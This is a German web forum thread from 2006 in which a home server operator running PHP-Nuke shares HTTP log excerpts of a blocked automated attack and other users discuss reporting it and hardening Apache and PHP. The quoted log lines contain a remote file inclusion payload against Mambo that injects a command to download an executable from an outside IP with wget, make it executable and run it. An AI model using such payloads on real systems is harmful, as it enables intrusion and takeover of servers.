Zugang erstellen oder einloggen.


      
          
Warp-Speed.de - phpNUKE, postNUKE, Zikula, e107, CMS, Addons, Module, Blocks, Themes, Fix, XAMPP, Apache, mySQL, PHP, FTP, IRC, Webmin, Webserver: Forums

Warp-Speed.de :: Thema anzeigen - Angriff auf den Webserver
 FAQFAQ   SuchenSuchen   BenutzergruppenBenutzergruppen   ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin 

Angriff auf den Webserver

 
Neues Thema eröffnen   Neue Antwort erstellen    Warp-Speed.de Foren-Übersicht -> MISC
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
crimson1968
Newbie
Newbie


Anmeldedatum: Mar 08, 2006
Beiträge: 6

BeitragVerfasst am: 06.04.2006, 13:04    Titel: Angriff auf den Webserver Antworten mit Zitat

Hi,

Heute habe ich feststellen müssen, das in meinem HTTP-Log Einträge zu finden waren, die auf den Versuch eindeutig böswilliger Machenschaften hindeuten. Soweit ich dies deute, scheint jemand ein "Hijacking" versucht zu haben (per Script/Bot, da die Eingaben doch recht massiv gebündelt reinkamen).

Da meine Seite vorab schon per Passwort geschützt ist, hatte dieser Versuch keinen Erfolg! Also ist logischerweise auch nix böses hängengeblieben.

Meine Frage an Euch ist, wie soll man dabei vorgehen? Lohnt es sich diese Sache weiterzuverfolgen, oder sollte man das einfach ignorieren?

Hier mal das Log in Auszügen, auch wenn's ein bischen unübersichtlich wirkt:


HTTP-Log Auszug:
_____________________________________________________________
203.214.25.125 - - [05/Apr/2006:16:49:33 +0200] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:34 +0200] "GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:36 +0200] "GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:37 +0200] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:39 +0200] "GET
/articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:40 +0200] "GET
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo|
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:41 +0200] "POST /xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:43 +0200] "POST /blog/xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:44 +0200] "POST
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:46 +0200] "POST
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:47 +0200] "POST /drupal/xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:49 +0200] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:50 +0200] "POST
/wordpress/xmlrpc.php HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:51 +0200] "POST /xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:53 +0200] "POST /xmlrpc/xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

203.214.25.125 - - [05/Apr/2006:16:49:54 +0200] "POST /xmlsrv/xmlrpc.php
HTTP/1.1" 401 462 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
_____________________________________________________________


Danke für Eure Unterstützung,
Crimson1968
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
AngusD
Supporter
Supporter


Anmeldedatum: Sep 09, 2003
Beiträge: 1345

BeitragVerfasst am: 06.04.2006, 13:39    Titel: Antworten mit Zitat

Du solltest das auf alle Fälle deinem Host mitteilen und ihn weitere Schritte einleiten lassen.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
crimson1968
Newbie
Newbie


Anmeldedatum: Mar 08, 2006
Beiträge: 6

BeitragVerfasst am: 06.04.2006, 14:00    Titel: Antworten mit Zitat

AngusD hat Folgendes geschrieben:
Du solltest das auf alle Fälle deinem Host mitteilen und ihn weitere Schritte einleiten lassen.

Hi.

Sorry, hatte vergessen zu erwähnen, daß das mein PC zuhause ist. Ich bin der Hoster! Habe den nur für ein paar Freunde und mich am Arbeitsplatz laufen, deswegen auch den Passwortschutz. Da ich DSL-Flatrate Nutzer bin und mein PC eh an ist, läuft da dieses Portal mit. Smile

Ich habe soweit alle mir bekannten/erdenklichen Sicherheitsvorkehrungen getroffen, also gehe ich dieses Risiko auch bewußt ein. Happy

Dank DynDNS kommt da auch jeder dran, der soll (und auch Andere, wie man dem Topic entnehmen kann).


mit freundlichem Gruß,
Crimson1968
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
warpspeed
Site Admin
Site Admin


Anmeldedatum: Jun 17, 2001
Beiträge: 6643
Wohnort: Germany

BeitragVerfasst am: 06.04.2006, 20:01    Titel: Egal... Antworten mit Zitat

Hi,

ich würde sagen, vergiss es einfach. Weiterverfolgen (Polizei) nutzt eh nichts (zuviel Aufwand). Ich habe hier am Tag ca. 20 Hackerangriffe (so wie deine)... die werden aber alle von NukeSentinel abgefangen... kümmert mich also auch nicht allzusehr Wink.
_________________
WarpSpeed
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen
crimson1968
Newbie
Newbie


Anmeldedatum: Mar 08, 2006
Beiträge: 6

BeitragVerfasst am: 07.04.2006, 09:21    Titel: Antworten mit Zitat

Hi warpspeed,

habe ich mir auch so ähnlich gedacht. Evtl. könnte man ja mal an die entsprechende "Abuse"-Mail Adresse einen Auszug aus dem Log schicken. Vielleicht kümmern die sich ja. Habe den Provider jedenfalls mittlerweile über die NIC (www.nic.com) ermittelt, der sitzt in Australien..... Confused Confused

Ich werde mir mal überlegen, ob ich das einfach so mache. Damit kann man ja evtl. Anderen diesen Unmut ersparen, den ich damit habe. Mad


Ich danke vielmals für die Stellungnahme. Happy


mit freundlichem Gruß,
Michael Steinheuer
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
AngusD
Supporter
Supporter


Anmeldedatum: Sep 09, 2003
Beiträge: 1345

BeitragVerfasst am: 07.04.2006, 10:00    Titel: Antworten mit Zitat

Ja, wenn du dein eigener "Hoster" bist, dann würde ich mich warpspeed anschließen...
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
maniacc
User
User


Anmeldedatum: Jan 31, 2006
Beiträge: 62
Wohnort: Austria

BeitragVerfasst am: 07.04.2006, 11:06    Titel: sELFHOSTER Antworten mit Zitat

Hy wie hast du den dein Apache ( PHP ) Konfiguriert ?? Bin auch selfhoster und hatte einen Monat lang nen Häcker im genick den habe ich aber weggebracht !!
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger
crimson1968
Newbie
Newbie


Anmeldedatum: Mar 08, 2006
Beiträge: 6

BeitragVerfasst am: 07.04.2006, 13:55    Titel: Antworten mit Zitat

Hi.

meine Konfiguration kommt "out of the box" (http://sourceforge.net/projects/webserv/). Darauf habe ich ein PHP-Nuke 7.9 gesetzt, die Security Patches von warpspeed eingespielt und generell ein Passwort per .htaccess an dedizierte Freunde vergeben.
Da das mein Heim-PC ist, habe ich einen DynDNS-Eintrag laufen, der meine IP auflöst, mein Router lässt die Anfragen auf Port 80 an meinen PC durch.

Da gibt's in Installationsverzeichnis des Webservers ein "log"-Verzeichniss wo alle relevanten Daten liegen. Darin habe ich diese Einträge gefunden.


Ich hoffe, das beantwortet Deine Fragen?


mit freundlichem Gruß,
Crimson1968
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
maniacc
User
User


Anmeldedatum: Jan 31, 2006
Beiträge: 62
Wohnort: Austria

BeitragVerfasst am: 07.04.2006, 16:59    Titel: hy Antworten mit Zitat

Wie hast du den php.ini und http.conf eingestellt ??


Aber weils so schön ist, mein Server läuft auf nen 2,6 GHZ 1 GB ram, 400 GB HDD und 2 Netzwerkkarten angeschlossen an einen Business Packet von Inode (austria) mit 5072/768 ( 8 Fixe IP´S ) dazu wurde ein Apache und Mercury Mailserver voll konfiguriert ( alle relevanten einstellungen wie register Globals usw wurden deaktiviert sowie PHP upload verboten !! Sql ist nur von Localhost ereichbar ( kein phpmyadmin ) sowie alle funktionen die nicht gebraucht werden aus dem http.conf rausgenommen !! Läuft bald 1,5 Jahre !! Da ich Win XP Prof verwende wurde die Netzwerkkarte so eingestellt das nur Ports rein und raus können die ich einstelle ( Portfiltering ) hat nix mit der Firewall zutun. Als Antivir wird Kaspersky 6 verwenden .

MFG
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger
crimson1968
Newbie
Newbie


Anmeldedatum: Mar 08, 2006
Beiträge: 6

BeitragVerfasst am: 08.04.2006, 22:42    Titel: Antworten mit Zitat

Hi.

Ich habe alles darin verboten was geht. Uploads von Code u.s.w. mache ich per sFTP, wenn ich von Außerhalb drauf will. War aber bisher auch nicht das Problem.
Und da meine .htaccess schon vor dem PHP-Nuke liegt, muß sich jeder eh erst authentifizieren, bevore er das könnte. Der Kreis ist momentan auf ca. 1 Dutzend Leute begrenzt, die ich alle persönlich kenne. Darum glaube ich auch nicht, das meine Sicherheit so einfach komprommitierbar ist.

mit freundlichem Gruß,
Crimson1968
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
maniacc
User
User


Anmeldedatum: Jan 31, 2006
Beiträge: 62
Wohnort: Austria

BeitragVerfasst am: 09.04.2006, 04:24    Titel: gut Antworten mit Zitat

gut gut irgendwo muss man mal anfangen um die sicherheitslücke zufinden Smile war auch keineswegs böse gemeind ! aber wenn du willst können wir nen banner tausch machen. mfg
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen MSN Messenger
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen    Warp-Speed.de Foren-Übersicht -> MISC Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 

Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.

Powered by phpBB © 2001-2007 phpBB Group
 

www.4thDimension.de - www.CryLand.com - www.Crysis-HQ.com - GS.4thDimension.info
www.Ellen-DeGeneres.com - www.Warp-Speed.de - www.Wiesler.net - WoW.4thDimension.info

...Haftungsausschluss/Impressum... - XML-SiteMap - ...Disclaimer/Imprint...